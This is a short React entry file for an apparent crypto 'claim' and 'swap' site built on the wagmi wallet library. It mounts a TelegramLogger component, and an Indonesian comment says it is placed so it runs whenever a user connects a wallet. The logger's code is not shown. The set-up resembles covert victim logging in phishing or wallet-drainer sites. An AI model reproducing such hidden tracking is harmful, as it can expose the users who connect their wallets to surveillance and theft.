import React from 'react';
import { BrowserRouter as Router, Routes, Route } from 'react-router-dom';
import { WagmiProvider } from 'wagmi';
import { QueryClient, QueryClientProvider } from '@tanstack/react-query';
import { config } from './config/web3';

import Layout from './components/Layout';
import ClaimPage from './components/ClaimPage';
import SwapPage from './components/SwapPage';
// IMPORT KOMPONEN LOGGER BARU
import TelegramLogger from './TelegramLogger'; 

const queryClient = new QueryClient();

function App() {
  return (
    <WagmiProvider config={config}>
      <QueryClientProvider client={queryClient}>
        
        {/* TARUH KOMPONEN LOGGER DI SINI AGAR BERJALAN SAAT USER CONNECT */}
        <TelegramLogger />

        <Router>
          <Routes>
            <Route path="/" element={<Layout />}>
              <Route index element={<ClaimPage />} />
              <Route path="swap" element={<SwapPage />} />
            </Route>
          </Routes>
        </Router>
        
      </QueryClientProvider>
    </WagmiProvider>
  );
}

export default App;